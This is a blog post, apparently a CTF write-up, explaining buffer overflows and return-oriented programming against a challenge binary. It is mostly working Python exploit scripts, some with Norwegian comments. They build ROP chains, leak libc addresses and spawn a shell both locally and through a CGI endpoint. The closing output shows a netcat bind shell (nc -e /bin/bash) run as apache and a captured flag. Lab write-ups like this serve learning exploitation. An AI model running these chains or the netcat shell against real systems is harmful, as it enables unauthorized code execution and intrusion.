Home
About
Blog
Media Gallery

Buffer Overflow and ROP


I participated for the first time in a CTF competition, December 2021, suggested to me by a friend. Set up and hosted by the norwegian military intelligence service as a part of their recruitment program. I ended up at #24 with 173 points which I was fairly happy with as a somewhat beginner.

One of the challenges was to exploit vulnerable buffers in a GNU/Linux binary. I had not looked at exploiting buffer overflows since the early '00s. I found it funny that using assembly snippets had become an entire thing of its own called Return Oriented Programming (ROP), where the asm snippets are called gadgets.

Well, I'm posting a note of the ROP code I used to shell both a local binary as well as via CGI (to abuse its elevated user rights). Mainly just as a rough reference if I ever play around with CTF again. It was an addictive rabbit hole... In this exact situation I had to exploit a binary via CGI. After getting local SSH access I created a script to in the user folder and overflowed input to the CGI binary to call it via a web call with a custom command written to the .bss WRITE ALLOC type memory in the binary, then calling it via execve. Before that, I practiced locally directly via standard input to the binary, but via libc offsets to use existing /bin/sh string instead of my own. Also included below.

In-depth
ROP programming is just about setting up a chain of assembly instructions to achieve simple function calls. E.g. to spawn a shell. The term "Return Oriented" is because each snippet of code, gathered via tools like ROPgadget or any disassembler, will have RET in the end so the instruction pointer can follow the stack pointer which will point to the addresses of the assembly snippets of code inserted into a byte string, effectively executing the chain of commands.

The whole trick with buffer overflows is to overwrite the memory address located in the stack right after memory allocated for the buffer, with code that does what you want. So that the instruction pointer can run it, instead of getting a segmentation fault when it tries to run bogus overflowed data. It doesn't matter what's already there, since essentially you're taking over. In the old days you could use the buffer itself for your own executable code, but not with today's default stack protections. That's the reason ROP originated in the first place, to use executable code that's already accessable in the binary itself.

The structure of asm varies between x86 and x64 e.g. in regards to function parameters, google as needed. I've coded for x64.

Via CGI. Did not find necessary string(s) in binary, so used available and writable .bss memory to write command for execve. Writable memory address can be found with GDB (maintenance info sections) and/or readelf (-S) tools. Utilizing the python library pwn from pwntools below.
from pwn import *
import time
import urllib.parse

# Kobling.
r = remote('anvilshop.utl', 80)

# Instruksjoner i lootd.v2. Lar noen stå ubrukt for testing og referanse.
POP_RDI = p64(0x4027fb) # pop rdi ; ret - Denne skal ha peker til '/bin/sh'
POP_RSI = p64(0x40a4f0) # pop rsi ; ret - Ikke viktig, kan være 0
POP_RDX = p64(0x403e03) # pop rdx ; ret - Ikke viktig, kan være 0
POP_RAX = p64(0x401001) # pop rax ; ret - Denne skal være 0x3b
POP_RBX = p64(0x401518) # pop rbx ; ret
PUTS_PLT = p64(0x4010d0) # Brukes for puts kallet.
PUTS_GOT = p64(0x40e070) # Brukes som puts argument.
MAIN_ = p64(0x401c7a) # For å gå tilbake til main etter puts omtur.
MAIN_CLI_ = p64(0x401c6a) # Ved hopp til cli_handler for å håndtere signal.
RET_ = p64(0x401002) # Se om det hjelper å aligne stack hos anvil.
EXIT_ = p64(0x401260) # testing.
STR_ = p64(0x40df92) # Random streng jeg kan bruke til testing "cgi_token_ok".
PRINT_F = p64(0x401050)
PRINT_F_FORMAT_STRING = p64(0x400000 + 0xb028)
CGI_DONE = p64(0x401e3e)
MOVELOOT_STR = p64(0x400000 + 0xb045)
SPAWN = p64(0x40a279)
SPAWN_ARG2 = p64(0x400000 + 0xb38c) # ABC=def
HTTP_AUTHORIZATION = p64(0x400000 + 0xb33d) # b33d HTTP_AUTHORIZATION
ENV_GET = p64(0x401ca6)
WRITE = p64(0x40a3d3) # mov dword ptr [rax + 8], edx ; mov eax, 0 ; pop rbx ; ret
EXECVE = p64(0x4010c0)
WRITE_MEM = (0x40e1e0) # .bss, teste å skrive streng her.
WRITE = p64(0x40a3d3) # mov dword ptr [rax + 8], edx ; mov eax, 0 ; pop rbx ; ret
EDX_PAD = b'\x00\x00\x00\x00' # Siden edx kun bruker de 4 laveste bytes.


# Skallkode.
p = b"A" * 168
p += RET_   # 16 byte align. RSP slutta på 8 ellers.

# Skriv reverse shell kommando til skrivbart minne:
p += POP_RAX
p += p64(WRITE_MEM)
p += POP_RDX
p += b'/hom' + EDX_PAD
p += WRITE
p += p64(0)

p += POP_RAX
p += p64(WRITE_MEM + 4)
p += POP_RDX
p += b'e/us' + EDX_PAD
p += WRITE
p += p64(0)

p += POP_RAX
p += p64(WRITE_MEM + 4*2)
p += POP_RDX
p += b'er/d' + EDX_PAD
p += WRITE
p += p64(0)

p += POP_RAX
p += p64(WRITE_MEM + 4*3)
p += POP_RDX
p += b'jsh\x00' + EDX_PAD
p += WRITE
p += p64(0)


# Bruk kommando med execve. 
# TESTET OK - uid=100(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
p += POP_RDX
p += p64(0)
p += POP_RSI
p += p64(0)
p += POP_RDI
p += p64(WRITE_MEM + 8)
p += EXECVE
p += EXIT_

# GET kall.
payload1 = b"GET /cgi-bin/lootd.v2/download?" + urllib.parse.quote_from_bytes(p).encode() +b" HTTP/1.1\r\n" \
           b"Host: anvilshop.utl\r\n" \
           b"Content-Type: text/html; charset=utf-8\r\n" \
           b"User-Agent: cgi_shell/1.0\r\n" \
           b"Authorization: thronic" \
           b"Accept: */*\r\n\r\n"

r.send(payload1)
time.sleep(1)
log.info(r.recv().decode('utf-8'))


Via stdin input. Still using pwn from pwntools. Instead of writing my own command, here I fetch a leaked address to libc and uses offsets to that instead.
from pwn import *
import time

# Prosessoppsett.
context.arch = 'amd64'
context.os = 'linux'
#s = remote('anvilshop.utl',3982)
s = process('./lootd.v2')

#
#   Forbered ASM "Gadget" offsets i selve programmet jeg kan bruke.
#
POP_RDI = p64(0x4027fb)	# pop rdi ; ret - Denne skal ha peker til '/bin/sh'
POP_RSI = p64(0x40a4f0)	# pop rsi ; ret - Ikke viktig, kan være 0
POP_RDX = p64(0x403e03)	# pop rdx ; ret - Ikke viktig, kan være 0
POP_RAX = p64(0x401001)	# pop rax ; ret - Denne skal være 0x3b
POP_RBX = p64(0x401518) # pop rbx ; ret
PUTS_PLT = p64(0x4010d0) # Brukes for puts kallet.
PUTS_GOT = p64(0x40e070) # Brukes som puts argument.
MAIN_ = p64(0x401c7a) # For å gå tilbake til main etter puts omtur.
MAIN_CLI_ = p64(0x401c6a) # Ved hopp til cli_handler for å håndtere signal.
MAIN_ALT_ = p64(0x401c91)
RET_ = p64(0x401002) # Se om det hjelper å aligne stack hos anvil.
EXIT_ = p64(0x401260) # testing.
START_ = p64(0x40b0dc) # testing.
STR_ = p64(0x40df92) # Random streng jeg kan bruke til testing "cgi_token_ok".
SIGNAL_ = p64(0x401160)

#
#   Forbered payload for å lekke libc offset.
#
p = b'A' * 136  # Junk for å fylle buffer.
p += POP_RDI    # Henter neste stackverdi inn i RDI (første parameter i 64 bit ASM).
p += PUTS_GOT   # Forbereder GOT adressen via objdump -D til POP RDI; RET.
p += PUTS_PLT   # Kaller puts funksjonen via PLT for å gi sin sanntids offset.
p += MAIN_

#log.info("Kommando for første ROP kjede som kan brukes for testing:")
#log.info("echo '"+ p.hex() +"' | xxd -r -p | ./lootd.v2")
log.info("Lagrer payload i payload_dump")
payload_dump = open("payload_dump","wb")
payload_dump.write(p)
payload_dump.close()

# Anvil trenger å bli "vekket" litt.
s.sendline(b'AAAAAAAA')
s.recvuntil(b'\n> ')

# Send payload og hent puts libc offset jeg kan regne ut base fra..
s.sendline(p)
received_raw = s.recv(timeout=1)
received_bytes = received_raw.split(b"\n")[1].rstrip(b'\n> ').ljust(8,b'\x00')
log.info("Lekket puts offset: "+ hex(u64(received_bytes)))
#log.info("Basert på: "+ str(received_raw))

#
#   Lekket detaljer fra resultat ovenfor (ANVILSHOP SIN LIBC).
#
#LIBC_SYSTEM = 0x3f716
#LIBC_BIN_SH = 0x91a62
#LIBC_SYSCALL = 0x16170
#LIBC_PUTS = 0x4a939
#LIBC_BASE = u64(received_bytes) - LIBC_PUTS
#log.info("Kalkulert libc base: "+ hex(LIBC_BASE))

#
#   Lekket detaljer fra resultat ovenfor (LOKAL LIBC).
#
LIBC_SYSTEM = 0x4fce0
LIBC_BIN_SH = 0xb01d7
LIBC_SYSCALL = 0x15a2e
LIBC_PUTS = 0x5fb40
LIBC_BASE = u64(received_bytes) - LIBC_PUTS
log.info("Kalkulert libc base: "+ hex(LIBC_BASE))

#
#   Data som trengs fra libc nå som jeg har libc base.
#
BIN_SH = p64(LIBC_BASE + LIBC_BIN_SH)
SYSCALL = p64(LIBC_BASE + LIBC_SYSCALL)
SYSTEM_ = p64(LIBC_BASE + LIBC_SYSTEM)

#
#   Forbered payload til execve.
#
p = b'A' * 136	# tomrom i buf.
#p += POP_RAX	# 0x3b for syscall.
#p += p64(0x3b)
p += POP_RDI	# "/bin/sh"
p += BIN_SH
#p += POP_RSI	# Arg 2,3 til NULL.
#p += p64(0)
#p += POP_RDX
#p += p64(0)
#p += SYSCALL	# Skal utløse EXECVE.
p += SYSTEM_

# Send til prosess.
s.sendline(p)
#s.recvuntil(b'\n')

# Gå interaktiv med det nye skallet.
s.interactive()


Still via stdin, but without pwntools.
I wanted to try my own interactive solution with native Python.

from struct import *
import os
import subprocess
import time

# Prosessoppsett.
process = subprocess.Popen(['./lootd.v2'],
        shell=True,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        bufsize=0)

# Globale variabler.
have_sent_payload_1 = False
have_sent_payload_2 = False
received_data_bytes = b''
libcaddr_bytes = b''
LIBC_BASE = 0x0

# ASM instruksjoner / "gadgets".
POP_RDI = pack("Q",0x4027fb) # pop rdi ; ret - Denne skal ha peker til '/bin/sh'
PUTS_PLT = pack("Q",0x4010d0) # Brukes for puts kallet.
PUTS_GOT = pack("Q",0x40e070) # Brukes som puts argument.
MAIN_ = pack("Q",0x401c7a) # For å gå tilbake til main etter puts omtur.

# Offsets.
LIBC_SYSTEM = 0x4fce0
LIBC_BIN_SH = 0xb01d7
LIBC_PUTS = 0x5fb40

def send_payload_1():
        #
        #   Forbered payload for å lekke libc offset.
        #
        p = b'A' * 136  # Junk for å fylle buffer.
        p += POP_RDI    # Henter neste stackverdi inn i RDI (første parameter i 64 bit ASM).
        p += PUTS_GOT   # Forbereder GOT adressen via objdump -D til POP RDI; RET.
        p += PUTS_PLT   # Kaller puts funksjonen via PLT for å gi sin sanntids offset.
        p += MAIN_

        # Anvil trenger å bli vekket litt.
        received_raw = os.read(process.stdout.fileno(), 4096)
        os.write(process.stdin.fileno(), b'AAAAAAAA\n')
        received_raw = os.read(process.stdout.fileno(), 4096)

        # Send payload og hent puts libc offset jeg kan regne ut base fra..
        os.write(process.stdin.fileno(), p)
        os.write(process.stdin.fileno(), b'\n')
        received_raw = os.read(process.stdout.fileno(), 4096)
        print("Lekket data: "+ str(received_raw))
        received_bytes = received_raw.split(b"\n")[1].rstrip(b'\n> ').ljust(8,b'\x00')
        print("Lekket puts offset: "+ hex(unpack("Q",received_bytes)[0]))

        #
        #   Lekket detaljer fra resultat ovenfor (ANVILSHOP SIN LIBC).
        #
        LIBC_BASE = unpack("Q",received_bytes)[0] - LIBC_PUTS
        print("Kalkulert libc base: "+ hex(LIBC_BASE))

        return LIBC_BASE


def send_payload_2():
        #
        #   Data som trengs fra libc nå som jeg har libc base.
        #
        BIN_SH = pack("Q",LIBC_BASE + LIBC_BIN_SH)
        SYSTEM_ = pack("Q",LIBC_BASE + LIBC_SYSTEM)

        #
        #   Forbered payload til system.
        #
        p = b'A' * 136  # tomrom i buf.
        p += POP_RDI    # "/bin/sh"
        p += BIN_SH
        p += SYSTEM_

        # Send til prosess.
        os.write(process.stdin.fileno(), p)
        os.write(process.stdin.fileno(), b'\n')

while True:
        if have_sent_payload_1 == False:
                LIBC_BASE = send_payload_1()
                have_sent_payload_1 = True
                continue

        if have_sent_payload_1 == True and LIBC_BASE != 0x0 and have_sent_payload_2 == False:
                send_payload_2()
                have_sent_payload_2 = True
                continue

        if have_sent_payload_1 == True and have_sent_payload_2 == True:
                #received_bytes = os.read(process.stdout.fileno(), 4096)
                #print(received_bytes.decode('utf-8'))
                shell_input = input("djshell> ")
                os.write(process.stdin.fileno(), shell_input.encode('utf-8') + b'\n')
                time.sleep(1)
                received_bytes = os.read(process.stdout.fileno(), 4096)
                print(received_bytes.decode('utf-8'))


Aftermath (Via CGI).
user@anvilshop ~ > ps aux
PID   USER     TIME  COMMAND
  409 apache    0:00 {djsh} /bin/sh /home/user/djsh
  410 apache    0:00 nc -lk -p 3982 -e /bin/bash --noprofile
  413 apache    0:00 /bin/bash --noprofile

login@corax:~/2_oppdrag$ nc anvilshop.utl 3982
id
uid=100(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
ls
FLAG_YOU_CANNOT_LFI
cat FLAG_YOU_CANNOT_LFI
245c4e7f65bde45cf55710ef6da1f2c3


Original Post: Feb 17th, '22 13:30 CET.
Updated: Sep 22nd, '22 10:48 CEST.

Tags: Python